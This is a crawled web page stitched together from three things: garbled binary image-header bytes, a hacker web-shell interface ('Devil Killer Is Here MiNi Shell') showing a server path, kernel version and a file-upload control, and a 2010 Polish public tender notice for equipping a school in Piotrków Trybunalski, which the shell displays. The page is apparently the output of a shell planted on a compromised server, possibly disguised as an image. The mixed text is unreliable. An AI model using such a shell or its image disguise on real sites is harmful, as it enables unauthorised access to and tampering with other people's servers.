JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/240222-N-2010.html

<p class="kh_header"><b>Piotrków Trybunalski: Dostarczenie sprzętu do nowej części Zespołu Szkół Ponadgimnazjalnych nr 4 w Piotrkowie Tryb. oraz do szatni i sanitariatów przy sali sportowej</b><br>
<b>Numer ogłoszenia: 240222 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Nr 4 im. ks. Jerzego Popiełuszki , Ul. H. Sienkiewicza 10/12, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 732 70 58, faks 44 732 70 58.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostarczenie sprzętu do nowej części Zespołu Szkół Ponadgimnazjalnych nr 4 w Piotrkowie Tryb. oraz do szatni i sanitariatów przy sali sportowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dostarczenie sprzętu do nowej części Zespołu Szkół Ponadgimnazjalnych nr 4 w Piotrkowie Tryb. oraz do szatni                        i sanitariatów przy sali sportowej w szczególności:
Część I  - meble szkolne
Lp.	                                  Nazwa i opis	     Ilość 
  1.	Zestaw szaf do pokoju nauczycielskiego	
	Meble wykonane z płyty wiórowej o grubości 18 mm , wieniec dolny   i górny z płyty o gr. 25 mm, kolor grusza calvados, okucia satynowe.


Szafka z 10 schowkami   o wymiarach 1800x800x400 mm
Szafka z 8 schowkami i przegrodami na dzienniki lekcyjne na 16 szt. o wymiarach  1800x800x400 mm
Szafa ubraniowa z drzwiami suwanymi, dzielona za pół    w pionie z drążkiem na wieszaki na całej szerokości  o wymiarach  1800x1600x600 mm                   	     

   


     3 szt.
     2 szt.
      
     1 szt.

      
      


     
  2.	Zestaw szafek do aneksu kuchennego - pokój nauczycielski  
Szafki wykonane z płyty wiórowej gr.18 mm, wieniec dolny            
 o gr. 25 mm, kolor grusza calvados.


Blat kuchenny o gr. 30 mm o łącznej długości 3500x600 mm
Szafka stojąca z 4 szufladami na prowadnicach  
1	wymiarach 400x500x850 mm
Szafka stojąca pod zlewozmywak        
1	wymiarach 900x500x850 mm
Szafka stojąca  z drzwiczkami, z półką w środku
1	wymiarach 600x500x850 mm
Szafka stojąca narożna     o wymiarach 800x500x850 mm
Szafka wisząca                 o wymiarach 600x350x750 mm
Zlewozmywak 1- komorowy z   ociekaczem , kolor stal dekor
                                         o wymiarach 780x435 mm
	




      

       1 szt.
       1 szt.

       1 szt.

       2 szt.

       1 szt.
       2 szt.
       1 szt.
       1 szt.
  3.	Stół konferencyjny z płyty wiórowej o gr. 25 mm na 5 nogach metalowych ,satynowych o wysokości 750 mm
o   wymiarach 1700x1000mm, kolor grusza calvados	
      3 szt.
  4.	Karnisz   drewniany  pojedyńczy, kolor grusza calvados długość   2500 mm
    	      2 szt.
  5.	Szafy wykonane z płyty wiórowej o gr. 18mm, wieniec górny i dolny z płyty 25 mm, kolor buk ciemny
Szafa z witryną o rozmiarach 1800x800x400 mm
Szafa aktowa     o rozmiarach 1800x800x400 mm
Szafa dzielona ? aktowa, ? ubraniowa 1800x800x400	


     3 szt.
      3 szt.
      1 szt.
  6.	Krzesło tapicerowane, stelaż metalowy o przekroju     25 mm, kolor bordo ( stelaż + tapicerka)	      
    40 szt.
  7.	Krzesło siedzisko i oparcie z tworzywa sztucznego, stelaż metalowy lakierowany  w kolorze czarnym. Krzesła           z możliwością  łączenia w szeregi za pomocą klamer, kolor brązowy.	
   50 szt.
  8.	Krzesło konferencyjne ze sklejki z pulpitem składanym, stelaż metalowy w kolorze czarnym, siedziska i oparcie    w kolorze ciemnoszarym.	
  100 szt.
  9.	Krzesło obrotowe tapicerowane do biurek komputerowych
o  podstawie 5- ramiennej, z podłokietnikiem , regulowaną wysokością siedziska i odchylanym oparciem., kolor ciemnoszary. 	
    20 szt.
 10.	Szafka metalowa z 4 schowkami. Wieniec dolny z blachy ocynkowanej o gr.0,8 mm, pozostałe elementy z blachy  0,6 mm. Szafka wyposażona w 4 wieszaki na ubranie. Schowki szafy zamykane zamkami cylindrycznymi, ryglowane w jednym punkcie. Kolor beż.
                                     wymiary 1800x600x490 mm	

    35 szt.
 11.	Szafka metalowa z 2 schowkami. Opis jak wyżej,
Szafka wyposażona w 2 wieszaki na ubranie.                                     wymiary 1800x300,x490 mm
	
     6 szt.
 12.	Ławka do szatni, stelaż wykonany z rurki stalowej, malowanej w kolorze czarnym. Siedzisko wykonane          z trzech  listew z drewna liściastego, lakierowanych lakierem bezbarwnym. Nogi wyposażone w stopki             z tworzywa nie niszczące podłogi
                                    wymiary  460x2000x440 mm	


   16 szt.
 13.	Biurko wykonane z płyty wiórowej gr. 18 mm, blat gr.     25 mm, obrzeże z PCV o gr25 mm, .wyposażone               w 4 szuflady z zamkiem centralnym, kolor buk ciemny,   
                                    wymiary 1200x700x740 mm                                                	
    1 szt.
 14.	Biurko ( opis jak wyżej) z wysuwaną półką na klawiaturę   i miejscem  na komputer, wymiary 1400x700x740 mm	    1 szt.
 15.	Biurko 1-osobowe wykonane z płyty wiórowej gr. 18 mm, blat gr.25 mm, obrzeże z PCV o gr 25 mm, z wysuwaną półką na klawiaturę i miejscem na komputer, kolor buk ciemny
                                    wymiary 800x700x740 mm	
   18 szt.
 16.	Tablica szkolna ,zwykła zielona, wym. 1700x1000 mm	     1 szt.
 17. 	Wykładzina dywanowa, targowa  ekspomat , zabezpieczająca nawierzchnię hali sportowej atest antypoślizgowy i łatwopalności,  szerokość    2000 mm,   w kolorze ciemnoszarym. 	
1.250 m2

Zaoferowana cena musi zawierać usługę transportu i montażu zaoferowanych przez Wykonawcę przedmiotów za wyjątkiem wykładziny dywanowej w pkt 17 powyższej tabeli, która należy tylko dostarczyć.

Część II - wyposażenie sanitariatów
Lp.	                        Nazwa i opis	   Ilość
   1.	Dozownik na mydło metalowy, pojemność 0,5 l.
kolor biały	    32 szt.  

   2.	Uchwyt na papier toaletowy metalowy, kolor srebrny	    26 szt.
   3.	Podajnik metalowy na ręczniki typ zz, kolor biały	    30 szt.
   4.	Szczotka wc plastykowa, kolor biały	    26 szt.
   5.	Lustro łazienkowe wiszące,
o wymiarach szer. 300 mm x dł. 400 mm.	    30 szt.   
 
   6.	Kosz na odpady o poj. 7 l. kolor biały	    38 szt.
   7.	Kosz  na odpady o poj. 10 l. kolor brąz	      8 szt.

Zaoferowana cena musi zawierać usługę transportu do Zamawiającego.
Część III - sala językowa

1.	Pulpit nauczyciela z jednostką centralną wzmacniacz stereo	2 szt.
2.	Moduł INTERACTIVE umożliwiający sterowanie funkcjami pracowni za pomocą komputera (gniazdo USB)	2 szt.
3.	INTERACTIVE PC program do sterowania funkcjami pracowni za pomocą komputera 	2 szt.
4.	Moduł symulacji rozmowy telefonicznej	2 szt.
5.	Przyłączeniowe stanowisko dla ucznia	18 szt.
6.	Okablowanie 	36 szt.
7.	Radiomagnetofon  z CD lub DVD	2 szt.
8.	Głośniki  do zabudowy w biurku moc 80 Wat	4 szt.
9.	Słuchawki pasmo przenoszenia 40-14,400 Hz, impedancja 2x400Ohms, czułość >98dB, maksymalna moc wejścia 100mW, mikrofon dynamiczny, pasmo przenoszenia 40-15,000Hz,  impedancja 200 Ohms, czułość 15dB, przewód wyjątkowo odporny na uszkodzenia mechaniczne, ramię mikrofony elastyczne, odporne na uszkodzenia	36 szt.
10.	Wieszaki do słuchawek 	36 szt.
11.	Biurko dla nauczyciela w kolorze buk ciemny lub inny biurowy kolor  z 4 szufladami na prowadnicach	2 szt.
12.	Biurko narożne kolor buk ciemny lub inny biurowy kolor	4 szt.
13.	Biurko dla ucznia kolor buk ciemny 	14 szt.
14.	Krzesło dla nauczyciela 	2 szt.
15.	Krzesło dla ucznia stelaż metalowy w kolorze czarnym, siedzisko i oparcie ze sklejki nr 6	36 szt.
16	Program komputerowy  Profesor Klaus, Profesor Henry	po 1 szt.
17	Tablica multimedialna rozmiar 78, rozdzielczość 12800x9200 format 4:3, wymiary1868 mmx1329 mm, powierzchnia aktywna 1628mmx1175mm przekątna powierzchni aktywnej 2000mm wbudowane głośniki i wzmacniacz, pióro elektroniczne nauczyciela, ucznia	2
Funkcje pracowni:
-sterowanie rozmowami nauczyciel uczeń indywidualnie, nauczyciel uczniowie grupowo
-obsługiwanie urządzeń audio wizualnych, tablicy interaktywnaj
-wyświetlanie materiałów na ekranie lub tablicy

Zaoferowana cena musi zawierać usługę transportu i montażu zaoferowanych przez Wykonawcę przedmiotów.

Część IV - siłownia - pomoce dydaktyczne

Lp.	                    Nazwa i opis	    Ilość
  1.	Materac gimnastyczny o wymiarach 1000x2000 mm	    3 szt.
  2.	Ławka pozioma ze stojakiem do wyciskania	    1 szt.
  3.	Hantle 5 kg.	    2 szt.
  4.	Hantle 4 kg.	   2 szt.
  5.	Gruszka bokserska,łożysko,platforma bokserska (komplet)	   1 szt.
  6.	Rękawice bokserskie	   6 par
  7.	Worki bokserskie 100 cm ze wspornikiem	    3 szt.
  8.	Piłka lekarska 3 kg. skóra naturalna	    3 szt.
  9.	Skakanki z linki stalowej z łozyskiem	    6 szt.
10.	Stoper mechaniczny	1 szt.


Część V - sala komputerowa - pomoce dydaktyczne

18 ZESTAWÓW KOMPUTEROWYCH ( dla ucznia ) O NASTĘPUJĄCEJ SPECYFIKACJI:

1.	Płyta główna

Gniazdo procesora	Zgodne z procesorem zaproponowanym poniżej przez oferenta
Format	Micro ATX
Typ pamięci	Dwukanałowa obsługa pamięci 
Dwa złącza DIMM obsługujące do 4 GB pamięci DDR2 
Obsługa pamięci DDR2 1066(OC)/800/667 
Złącza rozszerzeń	1 x PCI Express x1 
1 x PCI Express x16 
2 x PCI 
Zintegrowana karta graficzna	Tak (Pixel Shader 2.0, DirectX 9.0, wielkość pamięci współdzielonej 384MB)

Zintegrowana karta dźwiękowa	6 kanałów
Zintegrowana karta sieciowa	10/100/1000 Mb/s
Porty z tyłu płyty	1 x COM 
1 x D-Sub 
1 x LPT 
1 x RJ45 LAN 
3 gniazdka audio (wejście liniowe/ wyjście liniowe/mikrofon) 
4 x USB 2.0/1.1 
2 x PS/2 (klawiatura/mysz) 
1 x VGA

Wewnętrzne złącza wejścia wyjścia	1 złącze zasilania 24-pin ATX 
1 złącze zasilania 4-pin ATX 12V 
1 x CD in 
1 złącze wentylatora procesora 
1 x FDD 
1 złącze pinowe front audio 
1 złącze front panel 
1 x IDE 
1 złącze power LED 
1 x SPDIF out 
1 złącze wentylatora systemowego 
2 x USB 2.0/1.1 
4 złącza SATA 3Gb/s 


2.	Procesor

Architektura procesora 	Zgodna z x86, dwurdzeniowy
Fabryczny wentylator	BOX
Min. wartość w teście SYSMark 2007	115 
Maksymalny pobór mocy 	65.W 

3.	Pamięć

Rodzaj pamięci	DDR 2, DIMM
Pojemność pamięci	2 x 1024 MB
Częstotliwość pracy	800 MHz
Obsługa ECC	Nie
Opóźnienie - cycle latency	5

4.	Napęd DVD RW

Pojemność nośnika	4,7 GB, 8,5 GB
Pojemność pamięci podręcznej	2000 kB
Interfejs	SATA
Odczytywane formaty dysków	DVD-ROM, DVD-R/RW, DVD-RAM, DVD-R (dwuwarstwowe), DVD+R/RW, DVD+R (dwuwarstwowe), CD-ROM
Klasa szybkości odczytu CD-ROM:	48x
Klasa szybkości zapisu CD-R	48x
Klasa szybkości zapisu CD-RW	4x
Klasa szybkości odczytu DVD-ROM	16x
Klasa szybkości zapisu DVD-R	22x
Klasa szybkości zapisu DVD-RW	6x
Klasa szybkości zapisu DVD+R	22x
Klasa szybkości zapisu DVD+RW	8x
Klasa szybkości zapisu DVD-RAM	12x
Klasa szybkości zapisu DVD+R (dwuwarstwowa)	12x
Klasa szybkości zapisu DVD-R (dwuwarstwowa)	12x
Dual Layer (nagrywanie płyt dwuwarstwowych)	Tak

5.	Dysk twardy

Interfejs	Serial ATA 3Gbps
Pojemność	250 GB
Prędkość obrotowa	7200 obr./min.
Pojemność bufora DRAM	8 MB
Średni czas dostępu	8,9 ms

6.	Obudowa

Typ	Mini Tower
Ilość kieszeni 5,25	2 szt.
Ilość kieszeni 3,5	2 szt.
Złącza w przednim panelu 	Audio, 2x USB
Kolor obudowy	Czarny (dopuszczone niewielkie dodatki np. srebrne)

7.	Zasilacz

Moc minimalna	400W
Funkcja PFC	Tak
Filtry	Przeciwzwarciowy, przeciwprzepięciowy, przeciwprzeciążeniowy
Ilość wentylatorów chłodzących 	1 wolnoobrotowy
Regulacja obrotów wentylatora	Automatyczna (termiczna)
Dodatkowe	Złącze 6-pin PCI Express, min. 2x SATA

8.	Monitor LCD 19

Przekątna	19 cali
Rozdzielczość	1360x768
Kontrast	1000:1
Jasność 	250 cd/m2
Kąt widzenia poziom/pion	170/160
Kolor obrazu	16,7 mln
Czas reakcji (ms)	5
Złącze D-sib 15pin	Tak
Głośniki	Nie
Kolor	Czarny
Inne cechy	Zasilacz wbudowany w monitor

9.	Klawiatura

Typ	Tradycyjny
Komunikacja	Przewodowa
Ergonomiczny kształt	Tak
Klawisze multimedialne	Tak
Interfejs	PS2
Wersja produktu	OEM
Kolor	Czarny

10.	Mysz

Typ	Przewodowa, optyczna
Rozdzielczość	800 dpi
Ilość przycisków	2
Rolka przewijania	Tak
Interfejs	PS2, USB
Kolor	Czarny
Podkładka	Tak, czarna, jednokolorowa do pracy z myszką optyczną

W/w podzespoły muszą być ze sobą kompatybilne.

1 ZESTAW KOMPUTEROWY ( dla nauczyciela) NATĘPUJĄCEJ SPECYFIKACJI TECHNICZNEJ

1.	Płyta główna

Gniazdo procesora	Zgodne z procesorem zaproponowanym poniżej przez oferenta
Format	Micro ATX
Typ pamięci	Dwukanałowa obsługa pamięci 
4 złącza DIMM obsługujące do 8 GB pamięci DDR2 
Obsługa pamięci DDR2 1066(OC)/800/667 
Złącza rozszerzeń	Slot 1x PCI Express x 16 (x16) 
3 x PCI 
3 x PCI Express x1 
Zintegrowana karta graficzna	Nie
Zintegrowana karta dźwiękowa	8 kanałów
Zintegrowana karta sieciowa	10/100/1000 Mb/s
Porty z tyłu płyty		1 x LPT 
1 x PS/2 port klawiatury 
1 port myszy PS/2 
1 x RJ45 LAN 
1 x Port szeregowy 
1 x wyjście cinch SPDIF 
1 x optyczne wyjście SPDIF 
4 x USB 2.0/1.1 
6 x złącze audio (Line In / Line Out / MIC In / Surround Speaker Out(Rear Speaker Out) / Center/Subwoofer Speaker Out / Side Speaker Out) 

Wewnętrzne złącza wejścia wyjścia		1 złącze zasilania 24-pin ATX 
1 złącze zasilania 4-pin ATX 12V 
1 x CD in 
1 x złącze dla czujnika otwarcia obudowy 
1 x CMOS 
1 złącze wentylatora procesora 
1 x FDD 
1 złącze front panel audio 
1 złącze front panel 
1 x IDE 
1 złącze wentylatora zasilacza 
1 złącze power LED 
1 x SPDIF in 
1 x SPDIF out 
2 złącza wentylatora procesora 
2 x USB 2.0/1.1 
4 złącza SATA 3Gb/s 
Złącza rozszerzeń		Slot 1x PCI Express x 16 (x16) 
3 x PCI 
3 x PCI Express x1 

2.	Procesor

Architektura procesora 	Zgodna z x86, dwurdzeniowy
Fabryczny wentylator	BOX
Min. wartość w teście SYSMark 2007	156
Maksymalny pobór mocy 	65 W 

3.	Pamięć

Rodzaj pamięci	DDR 2, DIMM
Pojemność pamięci	2 x 1024 MB
Częstotliwość pracy	800 MHz
Obsługa ECC	Nie
Opóźnienie - cycle latency	5

4.	Napęd DVD RW

Pojemność nośnika	4,7 GB, 8,5 GB
Pojemność pamięci podręcznej	2000 kB
Interfejs	SATA
Odczytywane formaty dysków	DVD-ROM, DVD-R/RW, DVD-RAM, DVD-R (dwuwarstwowe), DVD+R/RW, DVD+R (dwuwarstwowe), CD-ROM
Klasa szybkości odczytu CD-ROM:	48x
Klasa szybkości zapisu CD-R	48x
Klasa szybkości zapisu CD-RW	4x
Klasa szybkości odczytu DVD-ROM	16x
Klasa szybkości zapisu DVD-R	22x
Klasa szybkości zapisu DVD-RW	6x
Klasa szybkości zapisu DVD+R	22x
Klasa szybkości zapisu DVD+RW	8x
Klasa szybkości zapisu DVD-RAM	12x
Klasa szybkości zapisu DVD+R (dwuwarstwowa)	12x
Klasa szybkości zapisu DVD-R (dwuwarstwowa)	12x
Dual Layer (nagrywanie płyt dwuwarstwowych)	Tak

5.	Karta graficzna

Szyna pamięci	64-bitowa
Rodzaj pamięci	DDR2
Zainstalowana pamięć wideo	512 MB
Częstotliwość RAMDAC	400 MHz
Taktowanie rdzenia	589 MHz
Taktowanie pamięci	400 MHz
Maksymalna rozdzielczość obrazu	2560 x 1600 pikseli
Typ złącza magistrali	PCI-E 16x
Złącze zewnętrzne		15 pin VGA 
1 x DVI-I
Obsługiwane standardy		DirectX 10.1 
OpenGl 3.2

6.	Dysk twardy

Interfejs	Serial ATA 3Gbps
Pojemność	500 GB
Prędkość obrotowa	7200 obr./min.
Pojemność bufora DRAM	32 MB
Średni czas dostępu	8,9 ms

7.	Obudowa

Typ	Mini Tower
Ilość kieszeni 5,25	2 szt.
Ilość kieszeni 3,5	2 szt.
Złącza w przednim panelu 	Audio, 2x USB
Kolor obudowy	Czarny (dopuszczone niewielkie dodatki np. srebrne)

8.	Zasilacz

Moc minimalna	500 W
Funkcja PFC	Tak
Filtry	Przeciwzwarciowy, przeciwprzepięciowy, przeciwprzeciążeniowy
Ilość wentylatorów chłodzących 	1 wolnoobrotowy
Regulacja obrotów wentylatora	Automatyczna (termiczna)
Dodatkowe	Złącze 6-pin PCI Express, min. 2x SATA

9.	Monitor LCD 19

Przekątna	19 cali
Rozdzielczość	1360x768
Kontrast	1000:1
Jasność 	250 cd/m2
Kąt widzenia poziom/pion	170/160
Kolor obrazu	16,7 mln
Czas reakcji (ms)	5
Złącze D-sib 15pin	Tak
Głośniki	Nie
Kolor	Czarny
Inne cechy	Zasilacz wbudowany w monitor

10.	Klawiatura

Typ	Tradycyjny
Komunikacja	Przewodowa
Ergonomiczny kształt	Tak
Klawisze multimedialne	Tak
Interfejs	PS2
Wersja produktu	OEM
Kolor	Czarny

11.	Mysz

Typ	Przewodowa, optyczna
Rozdzielczość	800 dpi
Ilość przycisków	2
Rolka przewijania	Tak
Interfejs	PS2, USB
Kolor	Czarny
Podkładka	Tak, czarna, jednokolorowa do pracy z myszką optyczną

W/w podzespoły muszą być ze sobą kompatybilne.

URZĄDZENIE WIELOFUNKCYJNE - 1 SZTUKA

Druk w kolorze	Nie
Szybkość druku (mono)	19
Maksymalny rozmiar nośnika	A4
Rozdzielczość w pion/poziom	600/600
Obciążenie	8000 str/mies.
Pojemność podajnika papieru	250
Pojemność tacy odbiorczej	125
Zainstalowana pamięć	32 MB
Wyświetlacz	Tak
Prędkość procesora	230 MHz
Złącza zewnętrzne	USB 2.0, LAN 10/100
Kabel PC w zestawie	TAK USB


PROJEKTOR MULTIMEDIALNY - 1 SZTUKA

Rozdzielczość	1920 x 1080
Kontrast	3700:1
Jasność	2600 ANSI Lum
Proporcie obrazu	4:3, 16:9
Funkcje obrazu	Ręczne ustawianie ostrości, zoom
Korekcja zniekształceń 	W pionie +/- 40 stopni
Żywotność lampy	4000
Złącza	S-Video. HDCP, D-sub, kompozytowe video
Pilot	Tak


GŁOŚNIKI KOMPUTEROWE - 2 KOMPLETY

Moc zestawu	Min. 50 W RMS
Liczba głośników	2.0
Zakres częstotliwości	20 - 20000Hz
Wbudowany zasilacz	Tak


EKRAN PROJEKCYJNY (ŚCIENNY)

Rozmiar	240x180
Zwijanie	Ręczne, koralikowe
Możliwość montażu na ścianie	Tak
Możliwość montażu na suficie	Tak
OPROGRAMOWANIE

Microsoft Windows XP Home Edition	18 sztuk
Microsoft Windows XP Professional	1 sztuka
Microsoft Office Standard 2007
19 sztuk
Lp.	Nazwa artykułu	ilość
1.	Sieć internetowa LAN	1
2.	Tablica multimedialna rozmiar 78, rozdzielczość 12800x9200 format 4:3, wymiary1868 mmx1329 mm, powierzchnia aktywna 1628mmx1175mm przekątna powierzchni aktywnej 2000mm wbudowane głośniki i wzmacniacz, pióro elektroniczne nauczyciela, ucznia	2

Jeżeli oferowany przedmiot zamówienia jest taki sam co do nazwy, parametrów z przedmiotem wyspecyfikowanym w opisie przedmiotu zamówienia w załączniku nr 1 Wykonawca w kolumnie symbol/producent materiału równoważnego wpisuje zgodne. Jeżeli oferowany asortyment jest równoważny należy wpisać parametry tego przedmiotu.

Zaoferowana cena musi zawierać usługę transportu i montażu zaoferowanych przez Wykonawcę przedmiotów.

Część VI - nagłośnienie obiektu i Sali gimnastycznej    
          
1. Sala konferencyjna w ZSP nr 4
Nagłośnienie składa się z:

a)	Głośniki aktywne szerokopasmowe o mocy około 550 WAT/SPL nie mniejsze niż : 125 dB, o  wadze dopuszczalnej do 17 kg, z obrotowymi uchwytami markowej firmy o minimalnym udźwigu 25 kg z systemem zabezpieczającym, o wymiarach nie przekraczających: 400 x 600 x 400 mm, o szerokim rozproszeniu fali dźwiękowej i wysokiej jakości dźwięku. Częstotliwość przenoszenia: 60 - 18000 Hz - 2 szt
b)	Wysokiej jakości przewody liniowe typu XLR  zabezpieczone wysokiej jakości oplotem ekranującym. E.M.I.
c)	Przewody zasilające z uziemieniem  zabezpieczone wysokiej jakości oplotem ekranującym.E.M.I
d)	Wysokiej jakości złącza audio -zasilające Neutrik
e)	Mikser foniczny, min. 12 kanałowy, z wejściami i wyjściami symetrycznymi typu XLR, z cyfrowym efektem pogłosowym z możliwością montażu w systemie rack		1 szt
f)	Odtwarzacz CD plików MP3 ze sterownikiem renomowanej firmy 1 szt	 
g) Dystrybutor zasilania 8 kanałowy z niezależnym włączaniem każdego kanału z systemem zabezpieczenia prądowego i napięciowego do zasilania całego systemu 1 szt.
h)  Podwójny system  mikrofonów bezprzewodowych   w systemie  , o charakterystyce kardioidalnej  2 szt.
i)  Skrzynia montażowa typu rack  z  zamykanymi drzwiczkami zabezpieczającymi  na w/w sprzęt   1 szt
k) Gwarancja serwisowa na w/w sprzęt  36 miesięcy, niezależnie od gwarancji producenta na w/w sprzęt wchodzący w skład systemu

2. Hala Sportowa w ZSP nr 4
Nagłośnienie składa się z:

a)	Głośniki aktywne szerokopasmowe o mocy około 550 WAT/SPL nie mniejsze niż : 125 dB, o  wadze dopuszczalnej do 17 kg, z obrotowymi uchwytami markowej firmy o minimalnym udźwigu 25 kg z systemem zabezpieczającym, o wymiarach nie przekraczających: 400 x 600 x 400 mm, o szerokim rozproszeniu fali dźwiękowej i wysokiej jakości dźwięku. Częstotliwość przenoszenia: 60 - 18000 Hz - 8 szt
b)	Wysokiej jakości przewody liniowe typu XLR  o długości 600m zabezpieczone wysokiej jakości oplotem ekranującym E.M.I.
c)	Przewody zasilające z uziemieniem  zabezpieczone wysokiej jakości oplotem ekranującym o długości 600m E.M.I.
d)	Wysokiej jakości złącza audio- zasilające  Neutrik
e)	Mikser foniczny, min. 12 kanałowy, z wejściami i wyjściami symetrycznymi typu XLR, z cyfrowym efektem pogłosowym, z możliwością montażu w systemie rack		1 szt
f)	Odtwarzacz CD plików MP3 ze sterownikiem renomowanej firmy 1 szt	 
g) Dystrybutor zasilania 8 kanałowy z niezależnym włączaniem każdego kanału z systemem zabezpieczenia prądowego i napięciowego do zasilania całego systemu 1 szt.
